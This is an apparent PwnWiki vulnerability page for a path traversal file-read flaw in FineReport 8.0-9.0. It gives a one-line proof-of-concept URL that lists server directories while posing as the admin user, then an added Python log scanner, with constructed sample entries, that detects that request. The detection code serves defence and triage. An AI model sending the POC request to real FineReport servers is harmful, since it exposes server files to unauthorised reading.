FineReport v8.0 - 9.0 Arbitrary File Read Vulnerability

From PwnWiki

Affected versions

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true
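
For triage, the request above can be searched for in web access logs. The following is an added example, not part of the original page or of FineReport: it flags log entries that call ReportServer with op=fs_remote_design and cmd=design_list_file, and marks those whose file_path contains a ".." segment. The combined log format and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

def classify(uri):
    """Return None, 'design_list_file' or 'design_list_file+traversal'."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/reportserver"):
        return None
    # parse_qs percent-decodes once; parameter names are compared lowercased.
    params = {k.lower(): v for k, v in
              parse_qs(parts.query, keep_blank_values=True).items()}
    if "fs_remote_design" not in params.get("op", []):
        return None
    if "design_list_file" not in params.get("cmd", []):
        return None
    # Decode a second time so double-encoded dot segments are also seen.
    paths = [unquote(p).replace("\\", "/") for p in params.get("file_path", [])]
    if any(".." in p.split("/") for p in paths):
        return "design_list_file+traversal"
    return "design_list_file"

def scan(lines):
    """Return (line number, client address, verdict) for each matching entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        verdict = classify(match.group("uri")) if match else None
        if verdict:
            hits.append((number, line.split()[0], verdict))
    return hits

# Constructed sample entries (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /WebReport/ReportServer?reportlet=demo.cpt HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1" 200 842',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=%2e%2e&isWebReport=true HTTP/1.1" 200 842',
    '192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=reportlets HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check only sees parameters carried in the logged query string, so requests that send them in a POST body need a source that records bodies.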